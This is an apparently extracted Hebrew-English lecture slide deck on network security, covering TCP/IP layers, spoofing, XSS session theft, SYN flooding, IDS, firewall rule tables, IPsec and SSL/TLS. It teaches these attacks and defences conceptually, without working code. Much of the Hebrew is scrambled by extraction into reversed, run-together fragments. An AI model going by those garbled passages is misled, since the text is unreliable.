chapter 8
DESCRIPTION
Chapter 8. אבטחת מידע ברשת האינטרנט. Stallings Chp. 6,8,9,21 22. מודל רשת ה- Internet. בשל המורכבות העבודה מתחלקת בין שכבות. כל שכבה מתקשרת פיזית עם השכבות הסמוכות לה, ולוגית עם השכבה המקבילה לה. מודל רשת ה- Internet. עיבוד חבילה בשליחה. מודל רשת ה- Internet. עיבוד חבילה בקבלה. - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/1.jpg)
I.B - Network security 1
Chapter 8
אבטחת מידע ברשת האינטרנט
Stallings Chp. 6,8,9,21 22
![Page 2: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/2.jpg)
I.B - Network security 2
Internetמודל רשת ה-
Application
TCP (תובלה)
IP (רשת)
MAC (פיזית)
בשל המורכבות העבודה מתחלקת בין שכבות.
כל שכבה מתקשרת פיזית עם השכבות הסמוכות לה, ולוגית עם השכבה המקבילה לה.
![Page 3: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/3.jpg)
I.B - Network security 3
Internetמודל רשת ה-
בשליחה חבילה עיבוד
![Page 4: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/4.jpg)
I.B - Network security 4
Internetמודל רשת ה-
עיבוד חבילה בקבלה
![Page 5: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/5.jpg)
I.B - Network security 5
Internetמודל רשת ה-
שכבה כל ותפקיד החבילה מבנה
MAC header . כתובת – את מכיל הפיזית המדיה לפי משתנה.MACה- נוספת ואינפורמציהIP header : כתובות – היתר בין , IPמכיל , והמקבל השולח של
TTL( ,הבא (, TCP/UDPהפרוטוקול פרוטוקול וגרסת אחר אוIP.UDP/TCP header : השולח של הפורטים מספרי מכיל
חיוויים )TCPוהמקבל. בנוסף ומספרים( syn/ackמכילסידוריים.
![Page 6: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/6.jpg)
I.B - Network security 6
Internetמודל רשת ה-
הרשת עולם
![Page 7: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/7.jpg)
I.B - Network security 7
תקשורת רשתות על איומים
מידע – למצוא ניתן המשתמשים על להקל נועדו מחשבים רשתות.' וכו, למקום ממקום אותו להעביר קל בקלות
, אותו להעביר שקל המידע את למצוא שקל היא הנלווית הבעיה. לתוקפים' – גם וכו
:trade-offקיים המידע בטיחות לבין ברשת השימוש נוחות בין , לפרוץ ניתן דרכן תורפה נקודות יוצרת לרשת התחברות
למערכת.. רבות תורפה נקודות לאבטח דורש ומשאבים נתונים ביזור.) מוגנים ) לא ורובם רבים שירותים יש בשכבות תלוי בלתי באופן להתקפות חשופה ברשת שכבה כל
האחרות
![Page 8: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/8.jpg)
I.B - Network security 8
Internetהתקפות ב-
SniffingDNS PoisoningIP Spoofing- ה: כתובת -IPשינוי ה hostשל
-- ה כתובת על רק מתבסס הזיהוי IPלעיתים
מוסגרת - לא התוקף כתובת
- " התקפות " לבזר מאפשר ) " למתחזה) תישלח לא התשובה כ בדר
![Page 9: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/9.jpg)
I.B - Network security 9
Internetהתקפות ב-
Port scan השרת על רצות אפליקציות זיהויSocial engineering -בריגול שימושי מאוד
תעשייתי מידע ואגירת שטח סיור...ועוד
![Page 10: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/10.jpg)
I.B - Network security 10
Cross Site Scripting (CSS/XSS)
בהרבה מלאה שונות )scriptsהרשת ...(JavaScript/VBScriptבשפות - לתוך לביצוע קוד שורות להכניס כדי תקינות בדיקת חוסר לנצל הרעיון
מסמכים. – אחרי כי נניח -loginלדוגמא ה לשרת , webmailמוצלח אתם שלכם
לכתובת www.webmail.example.com/inbox?sid=valueמועברים. אימות לאחר שלכם הכניסה של מזהה הוא השווה סימן אחרי הערך כאשר
( לדוגמא לתוקף הכתובת את יעביר אשר קוד דואר הודעת בתוך לשתול ניתן " י" ע בהודעה בכוונה נשתלה שכתובתו קיים שלא למשאב לגשת נסיון י ע
- ה( את לדעת התוקף יכול וכך -URLהתוקף ה את גם .sidולכן
קבצי של לשליחה לגרום יכולה תקינות בדיקת מאי שנובעת אחרת בעייהדף של למשתמש )aspהקוד ולהורות hackerמהשרת זאת לנצל יכול
' , , שמות נמצאים שם למע הכניסה דף של קוד קבצי למשל לו לשלוח לשרת- " . ב פרמטר הוספת י ע זאת כל שלהם הכניסה וקוד אותו URLמשתמשים של
asp.)
![Page 11: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/11.jpg)
I.B - Network security 11
על TCPהתקפות
מעל שרצים רבות TCPשרתים להתקפות חשופיםשרתים) עבור גם קיימות התקפות מאותן חלק
מעל (.UDPשרצים – מתחיל כאשר מערכת, TCP sessionהסיבה
. משאבים מקצה ההפעלה- ש עד מוקצים נשארים המשאבים מחליט TCPכל
של ) sessionשה- במקרה דקות שתי TCPסגורתקני(.
של להפיל TCP sessionsפתיחה יכולה מדי רבים. המחשב את
![Page 12: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/12.jpg)
Classic Denial of Service Attacks (Chp 8)
can use simple flooding pingfrom higher capacity link to lowercausing loss of trafficsource of flood traffic easily
identified
![Page 13: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/13.jpg)
Source Address Spoofing
use forged source addressesgiven sufficient privilege to “raw sockets”easy to create
generate large volumes of packetsdirected at targetwith different, random, source
addressescause same congestionresponses are scattered across Internetreal source is much harder to identify
![Page 14: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/14.jpg)
SYN Spoofing
other common attackattacks ability of a server to respond
to future connection requests overflowing tables used to manage
themhence an attack on system resource
![Page 15: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/15.jpg)
TCP Connection Handshake
![Page 16: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/16.jpg)
SYN Spoofing Attack
![Page 17: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/17.jpg)
SYN Spoofing Attack
attacker often uses eitherrandom source addressesor that of an overloaded serverto block return of (most) reset packets
has much lower traffic volumeattacker can be on a much lower
capacity link
![Page 18: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/18.jpg)
I.B - Network security 18
הגנות ברשת
: - סוגים תתי לשני האבטחה בעיות את לסווג ניתן לעולם המחשב מחשיפת הנובעות בעיות) השכבות ) מודל הרשת מארכיטקטורת הנובעות בעיות
: הגנה, סוגי שני על לדבר ניתן לפיכךFirewalls -לעולם החשיפה לצמצום - בנפרד שכבה כל על להגנה אבטחה פרוטוקולי
![Page 19: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/19.jpg)
I.B - Network security 19
הגנות ברשת
Firewalls / משאבים נתונים על הגנה מספקים. " המוגנת" הרשת בתוך נייחים
: נתונים על להגן אבטחה פרוטוקולי של המטרה , , אימות ) שלמות סודיות לספק ברשת מעבר בזמן
.) ועוד השולח , : : למשל נוספות התקפות מניעת נוספת מטרה
- ו הקשר .syn attackחטיפת מערכות IDS – Intrusion Detection
Systems
![Page 20: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/20.jpg)
Intrusion Detection Systems (Chp. 6)
classify intrusion detection systems (IDSs) as:Host-based IDS: monitor single host activityNetwork-based IDS: monitor network traffic
logical components:sensors - collect dataanalyzers - determine if intrusion has occurreduser interface - manage / direct / view IDS
![Page 21: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/21.jpg)
IDS Principles
assume intruder behavior differs from legitimate usersexpect overlap as shownobserve deviations
from past historyproblems of:
false positivesfalse negativesmust compromise
![Page 22: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/22.jpg)
IDS Requirements
run continuallybe fault tolerantresist subversionimpose a minimal overhead on systemconfigured according to system security
policies adapt to changes in systems and usersscale to monitor large numbers of systemsprovide graceful degradation of serviceallow dynamic reconfiguration
![Page 23: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/23.jpg)
Host-Based IDS
specialized software to monitor system activity to detect suspicious behaviorprimary purpose is to detect intrusions, log suspicious
events, and send alertscan detect both external and internal intrusions
two approaches, often used in combination:anomaly detection - defines normal/expected behavior
threshold detection profile based
signature detection - defines proper behavior
![Page 24: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/24.jpg)
Audit Records
a fundamental tool for intrusion detection
two variants:native audit records - provided by O/S
always available but may not be optimum
detection-specific audit records - IDS specificadditional overhead but specific to IDS taskoften log individual elementary actionse.g. may contain fields for: subject, action, object,
exception-condition, resource-usage, time-stamp
![Page 25: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/25.jpg)
Anomaly Detectionthreshold detection
checks excessive event occurrences over timealone a crude and ineffective intruder detectormust determine both thresholds and time intervals
profile basedcharacterize past behavior of users / groupsthen detect significant deviationsbased on analysis of audit records
gather metrics: counter, guage, interval timer, resource utilization
analyze: mean and standard deviation, multivariate, markov process, time series, operational model
![Page 26: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/26.jpg)
Network-Based IDS
network-based IDS (NIDS)monitor traffic at selected points on a networkin (near) real time to detect intrusion patternsmay examine network, transport and/or
application level protocol activity directed toward systems
comprises a number of sensorsinline (possibly as part of other net device)passive (monitors copy of traffic)
![Page 27: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/27.jpg)
I.B - Network security 27
הגנות ברשת
Firewalls / משאבים נתונים על הגנה מספקים. " המוגנת" הרשת בתוך נייחים
: נתונים על להגן אבטחה פרוטוקולי של המטרה , , אימות ) שלמות סודיות לספק ברשת מעבר בזמן
.) ועוד השולח , : : למשל נוספות התקפות מניעת נוספת מטרה
- ו הקשר .syn attackחטיפת מערכות IDS – Intrusion Detection
Systems
![Page 28: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/28.jpg)
I.B - Network security 28
Firewall
Firewall אזורים שני בין שמפרידה מערכת היא. ביניהם התקשורת על אבטחה מדיניות וכופה ברשת
: להיות יכולים האזורים/ ציבורית פרטית רשת ( של הרשת שונים סיווגים בעלות ארגון של רשתות תתי
) האחרות המחלקות וכל כספים מחלקתFirewall בין העוברת התעבורה של סינון מבצע
. שונים אזוריםFirewall , בודד נתב או ממחשב מורכב להיות יכול
.' , וכו נתבים מחשבים מאוסף או
![Page 29: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/29.jpg)
I.B - Network security 29
Firewall
Choke point – דרך התעבורה כל ניתוב . החיצוני העולם אל המידע זרימת כל צר נתיב
- ה דרך עוברת FirewallוממנוFail safe , אך – פריצה גוררת איננה נפילה
! מנותקת התעבורה זה במקרה פשוט מבנה הקצה למשתמש שקיפות
![Page 30: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/30.jpg)
I.B - Network security 30
Firewall
![Page 31: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/31.jpg)
I.B - Network security 31
Firewall
: סוגים לשלשה לחלק ניתן(stateless ) Packet Filter -החבילות את מסנן
סטאטיים כללים לפיStateful PF -דינאמיים בכללים משתמש
ההתקשרות מצב אחרי העוקביםProxy servers -בין אקטיבית התערבות
המרוחק לשרת המשתמש
![Page 32: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/32.jpg)
I.B - Network security 32
Stateless PFדוגמה -
- שלנו שברשת לכל, N1נניח לאפשר מעוניינים אנולבצע לרשת telnetהמחשבים מחוץ מחשב לכל
- אחד למחשב .C1פרט חיבור לאפשר נרצה כן -HTTPכמו ה Webבין
Server, S1. באינטרנט, המחשבים לכל ,מחוץ מחשבים של התחזות למנוע נרצה בנוסף
. פנימי למחשב לרשת. אסורה אחרת תקשורת כל
![Page 33: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/33.jpg)
I.B - Network security 33
Stateless PFדוגמה -Rule In/
Out
Src adr.
Dst adr.
Next prot.
Src port
Dst port
TCP flag
Action
spoof in N1 any any any any any deny
no_telnet1
out C1 any TCP >1023
23 any deny
no_telnet2
in any C1 TCP 23 >1023
any deny
telnet1 out N1 any TCP >1023
23 any permit
telnet2 in any N1 TCP 23 >1023
ack permit
HTTP1 in any S1 TCP >1023
80 any permit
HTTP2 out S1 any TCP 80 >1023
ack permit
default any
any any any any any any deny
telnet 23- פורטhttp 80- פורט
1023<פורט כללי-
![Page 34: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/34.jpg)
I.B - Network security 34
Active/Passive FTP
של לפורט FTPבמצב פונה הלקוח לאתחול 21אקטיבי השרת שלאת, לקבל מעוניין הוא בו פורט מספר לו מעביר זמן ובאותו הקשר
.Dataה- מפורט פונה השרת השני המשתמש 20בשלב של לפורט קשר ויוזם: כך תראה הטבלה
Rule In/Out
Src adr.
Dst adr.
Next prot.
Src port
Dst port
TCP flag Action
ftp_21_1 out N1 any TCP >1023 21 any permit
ftp_21_2 in any N1 TCP 21 >1023 ack permit
ftp_20_1 in any N1 TCP 20 >1023 any permit
ftp_20_2 out N1 any TCP >1023 20 ack permit
שלו 20נשים לב כי החוק השלישי מאפשר לתוקף ליזום קשר מפורט . 1023<למחשב פנימי שפתח פורט
![Page 35: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/35.jpg)
I.B - Network security 35
Active/Passive FTP
של לפורט FTPבמצב פונה הלקוח , 21פאסיבי הקשר לאתחול השרת של- ה יועבר בו פורט מספר לו מעביר השרת הפעם .Dataאך
. מהשרת שקיבל לפורט קשר ויוזם כלשהו מפורט פונה הלקוח הבא בשלב: כך תראה הטבלה זה במקרה
Rule In/Out
Src adr.
Dst adr.
Next prot.
Src port
Dst port
TCP flag Action
ftp_21_1 out N1 any TCP >1023 21 any permit
ftp_21_2 in any N1 TCP 21 >1023 ack permit
ftp_data_1 out N1 any TCP >1023 >1023 any permit
ftp_data_2 in any N1 TCP >1023 >1023 ack permit
הפעם אין אפשרות ליזום קשר אל מחשב פנימי בעזרת החוקים הללו. נשים לב כי השרת צריך לנקוט בצעדי מניעה מתאימים שהרי הפעם
ניתן ליזום קשר לפורטים גבוהים בשרת.
![Page 36: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/36.jpg)
I.B - Network security 36
Stateful PF
- ב המחשבים לכל המאפשר סטטי חוק בטבלה :telnetלבצע N1נשיםtelnet: out, N1, any, TCP, >1023, 23, syn, permit
שמשתמש נניח -Cכעת -N1מ ה לשרת להתחבר מחשב telnetמעוניין RCשל . כך לצורך באינטרנט נמצא מפורט Cאשר חבילה לפורט 1049שולח של 23שלו
RC- , ה. זה קשר המאפשר סטטי חוק קיים שבטבלה לטבלת Firewallכיוון יוסיף: הבאות הדינאמיות השורות את החוקים
telnet1: out, C, RC, TCP, 1049, 23, ack, permittelnet2: in, RC, C, TCP, 23, 1049, ack, permit
בין הקשר סגירת לאחר ממנה יוסרו לטבלה שנוספו הדינאמיות -Cהשורות RCל - חבילות TCPב) מתוך לזהותה ניתן ולכן מסודרת בצורה נעשית קשר סגירתלאחר( TCPה- לחלופין .timeoutאו
קשר לאפשר ניתן דומה -FTPבאופן , ל לאפשר יש אולם גישה Firewallאקטיבי- ' ה ) יועבר בו הפורט מס את לדעת בכדי האפליקציה ברמת כך dataלמידע
.) אליו הקשר שיתאפשר
![Page 37: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/37.jpg)
I.B - Network security 37
Proxy server
Proxy server - שהתקבל שקובץ לבדוק למשל מקודמיו יותר מסובכות פעולות לבצע יכול.ftpמשרת וירוסים מכיל לא
- ה אצל עוברות החבילות -Proxy Serverכאשר המידע Proxy Serverה, על בדיקות מבצע . כך לשם החבילה עם לעשות מה מחליט בדיקות אותן סמך ועל המחשבים שני בין המועבר
- ה מען )Proxy Serverעל הוא עליו הפרוטוקול את , telnetלהכיר .) כללי באופן לכן למשליחידה )Proxy Serverכל אפליקציה על (.httpאו telnetיגן למשל,
- ש לפעולות :Proxy Serverדוגמאות לבצע יכול. לעשות מה להחליט כדי מידע מספיק שמכילות חבילות אליו שיגיעו לחכות. , אותו לשנות או לזרוק המידע את להעביר. שלו הדפדפן ידי על המבוקשים בדפים תמונות יראה לא שהמשתמש לכך לגרום- מה מידע יקבלו מסויימים משתמשים שרק של Proxy Serverלדאוג אימות לבצע או
.) " השירות ) מתן לפני מהמשתמש סיסמה דרישת י ע למשל המשתמש. - לארגון שנכנסים קבצים על וירוס אנטי תוכנת להכניס- שב יועברו FTPלדאוג לא אולם הפנימית הרשת לתוך מהאינטרנט רק יועברו קבצים
. החוצה הפנימית מהרשת
![Page 38: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/38.jpg)
I.B - Network security 38
התצורה המקובלת
![Page 39: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/39.jpg)
I.B - Network security 39
Firewallsהמצב כיום -
של ההתקפות חסימת ירדה firewallsיעילותהאחרונות בשנים משמעותית
עוקפת מחשבים: firewallתעבורה לדוגמאניידים
פתוחים שלרוב פורטים על התקפותפורט: firewallsב- 80לדוגמא- ב שהשימוש אומר זה , firewallאין מיותר
. " , כ בדר מספיק אינו שהוא אלא
![Page 40: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/40.jpg)
I.B - Network security 40
אבטחה פרוטוקולי
להוסיף שכבה באיזו? אבטחה שירותי
שפרוטוקול: נאמר הגדרהברמה עובד xאבטחה
המידע על מגן הוא אםשמעל השכבות . xשל
הגנה, הוספת לדוגמא: הרשת ברמת
Application
TCP (תובלה)
IPsec
IP (רשת)
MAC (פיזית)
![Page 41: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/41.jpg)
I.B - Network security 41
האפליקציה ברמת אבטחה פרוטוקול
, - , , נגד הגנה הכחשה אי שלמות סודיות לספק ניתן.) האפליקציה ) ברמת השולח ואימות חוזר שידור
. בניתוב פוגע איננו מסופקend to end. של בדיקות משבש .firewallsאיננו כדוגמת התקפות כנגד מגן .Syn attackאיננו. / האפליקציה עדכון שינוי מחייב :דוגמהPGP.
![Page 42: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/42.jpg)
I.B - Network security 42
התובלה ברמת אבטחה פרוטוקול
, , חוזר שידור נגד הגנה שלמות סודיות לספק ניתן. השולח ואימות
. בניתוב פוגע אינו לספק .end to endניתן של בדיקות משבש .firewallsאיננו כדוגמת התובלה שכבות על התקפות כנגד מגן איננו
Syn attack.. לאפליקציה שקוף :דוגמהSSL/TLS
![Page 43: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/43.jpg)
I.B - Network security 43
הרשת ברמת אבטחה פרוטוקול
, , חוזר שידור נגד הגנה שלמות סודיות לספק ניתן- ה ) ברמת השולח (.IPואימות
. בניתוב פוגע איננו לספק .gateway to gatewayאו end to endניתן של בדיקות .firewallsמשבש- ל .transportשקוף ולאפליקציה ( כגון התובלה שכבות על התקפות נגד להגן synניתן
attack.) :דוגמאIPsec.
![Page 44: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/44.jpg)
I.B - Network security 44
הפיזית ברמה אבטחה פרוטוקול
( , ברמת השולח ואימות שלמות סודיות לספק ניתן(.MACה-. פיזית מדיה תלויhop by hop – בניתוב נקודות שתי כל בין כלומר
. ההגנה שכבות את להחליף צריך- מה ביותר הגדול החלק על .datagramמגן- ל מורידה ) IPשקוף שמטפלת תחנה כל כי ומעלה
- ה ברמת ההגנה שכבות (MACאת :דוגמאWEP.
![Page 45: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/45.jpg)
I.B - Network security 45
IPSecאבטחה ברמת הרשת -
IPSec הבאים הפרוטוקולים את מכיל תעבורת לאבטחת פרוטוקולים :IPשני
ESP / אימות – או ו הצפנה מספקAH – בלבד אימות מספק
מפתחות והחלפת לניהול .IKEפרוטוקול- ב להשתמש :IPSecניתן אופנים בשני
-Transport Mode -קצה מחשבי בין -Tunnel Mode ( -למשל למשתמש שקוף באופן
(VPNליצירת
![Page 46: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/46.jpg)
I.B - Network security 46
Tunnel mode
A B
Encrypted Tunnel
Gateway Gateway
New IP Header
AH or ESP Header
TCP DataOrig IP Header
Encrypted
Unencrypted Unencrypted
![Page 47: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/47.jpg)
I.B - Network security 47
IPSec
ערוץIPSec. הדדי אמון ביניהן שיש מכונות בין רק מוקם. - טווח ארוכי מפתחות החלפת באמצעות ליצור ניתן האמון את ( שימוש יש פומביים מפתחות להיות יכולים אלה מפתחות
" PKIב- י ע מעין( ) X.509שמוגדר סימטריים מפתחות או .) " משותפת" סיסמא
- ל החשיפה צמצום מאפשר המכונות בין ההדדי synהאמוןattack וכנגדDoS.
, מכונה אם זאת , Bומכונה Aעם ותוקף הדדי אמון בעלותמכונה על תקיפת, Aמשתלט לצורך בה להשתמש יוכל הוא
B.
![Page 48: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/48.jpg)
I.B - Network security 48
IPSec
בו שמותקן מחשב מבנה, IPSecכל מחזיקשנקרא Security Associationנתונים
Database ,בקיצור .SADאו שנקראות רשומות מחזיק זה נתונים מבנה
Security Association ( ובקיצורSA.)
![Page 49: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/49.jpg)
I.B - Network security 49
IPSec
SAD- מ מורכב שנקראות SA (Securityרשומות
Association) שנקראים הרשומות של SPIאינדקסים
(Security Parameter Index) של שהתוכן , SAמכיוון מכונות לשתי משותף
שני SAלכל במכונה, SPIיש והשני AאחדBבמכונה
![Page 50: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/50.jpg)
I.B - Network security 50
IPSecדוגמה -
![Page 51: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/51.jpg)
I.B - Network security 51
IPSecדוגמה -
SA : לבוב מאליס אליס אצלProtocol = ESP, transport mode,
Enc. Key = DES3, Intg. Key = HMAC-MD5Life time = 10 Min
SPI = 17 Alice’s encryption key = 0x0c0c0c
Alice’s integrity key = 0x0d0d0dSequence number: 20
Alice BobSPI = 17
![Page 52: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/52.jpg)
I.B - Network security 52
IPSec
IPSec: הבאים האבטחה שירותי את מספק- ב – בהצפנה ESPסודיות שימוש תוך- ה – באמצעות MACשלמות- ה – באמצעות השולח MACאימות- ה – באמצעות חוזר שידור כנגד sequence numberהגנה- ה – ידיעת דרישת באמצעות גישה תקשורת SAבקרת לצורך המתאים- ל החשיפה לבצע, syn attackמזעור יכול אינו שתוקף IPמכיוון
spoofing- ה ) ידיעת (.SAודרישת המתאים נגד / session hijackingהגנה " אימות – או ו הצפנה י ע כנגד -IP spoofingמניעת – DoSהגנה ה ) ידיעת (.SAודרישת המתאים
![Page 53: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/53.jpg)
I.B - Network security 53
IPSecהצפנה ואימות -
:IPSecל- פרוטוקולים תתי שניESP – Encapsulating Security
Payload , , שלמות אימות סודיות מספקחוזר שידור כנגד והגנה
AH – Authentication Header , ושלמות אימות חוזר שידור כנגד הגנה מספק
- ה) של (IP headerגם
![Page 54: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/54.jpg)
I.B - Network security 54
ESP
![Page 55: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/55.jpg)
I.B - Network security 55
AH
![Page 56: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/56.jpg)
I.B - Network security 56
SSL/TLS
עם תחילת השימוש במסחר האלקטרוני היה חשש לגבי בטיחות המידעהנשלח ברשת.
.על מפתחי האפליקציה נגזר להוסיף אמצעי בטיחות בתוך האפליקציה פיתחה 1994בשנת Netscape Communications -את פרוטוקול ה SSL
(Secure Socket Layer). פרוטוקול הממומש כמעין שכבה נוספת בפרוטוקול השכבות, בין שכבות
האפליקציה והתובלה.:הפרוטוקול מספק לשכבת האפליקציה שמעליו
.)אימות זהות )השרת ו/או הלקוח.שלמות.אימות ההודעות.סודיות להודעות
.פרוטוקול זה נחשב כיום כסטנדרט במסחר אלקטרוני הגרסה הסטנדרטית נקראת גםTLS (Transport Layer Sec.).
![Page 57: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/57.jpg)
I.B - Network security 57
SSL/TLS
( למשל מסוימת אפליקציה האם בהבחנה צורך (, httpיש " י ע . SSLמוגנת גם מוקצה לכל כך לצורך שלא portאו
עם עובדת כאשר תשתמש בו .SSLנוסף :לדוגמאhttp מעלSSL (https) בפורט בעוד, 443עובד
בפורט httpש- עובד .80רגיל
Application
SSL RecordSSL Record
TCP
IP
MAC
![Page 58: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/58.jpg)
I.B - Network security 58
SSL/TLS
- ו האפליקציה לשכבות אבטחה נותן .SSLהפרוטוקוליתרונות: התובלה ברמת לאבטחה
. ' אבטחה ' עם מהתעסקות פטור האפליקציה כותב. האפליקציות סוגי לכל מתאימה האבטחה מעל עובד שהפרוטוקול המהימנות, TCPמכיוון את אוטומטית מקבל הוא
- ב TCP( Ack.)הקיימת , חבילות סידור חבילה לכל עם עבודה - Packet Filtering Firewallsמאפשר שה, מפני headersזאת
.TCP/IPשל מוצפנים אינם
חסרונות: התובלה ברמת לאבטחה - ב הנמצא .TCP/IPשל headersהמידע ברשת חשוף נשלח - ה על אימות מבוצע שלא מספק TCP/IPשל headersמכיוון לא הפרוטוקול
: ההתקפות בפני הגנהSyn Attack - ה – שכבת על .TCPהתקפהIP Spoofing - ה – שכבת על .IPהתקפה
![Page 59: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/59.jpg)
Secure Sockets Layer (SSL)
transport layer security serviceoriginally developed by Netscapeversion 3 designed with public input
subsequently became Internet standard RFC2246: Transport Layer Security (TLS)
use TCP to provide a reliable end-to-end service
may be provided in underlying protocol suite
or embedded in specific packages
![Page 60: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/60.jpg)
SSL Protocol Stack
![Page 61: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/61.jpg)
SSL Record Protocol Services
message integrityusing a MAC with shared secret keysimilar to HMAC but with different padding
confidentialityusing symmetric encryption with a shared
secret key defined by Handshake ProtocolAES, IDEA, RC2-40, DES-40, DES, 3DES,
Fortezza, RC4-40, RC4-128message is compressed before encryption
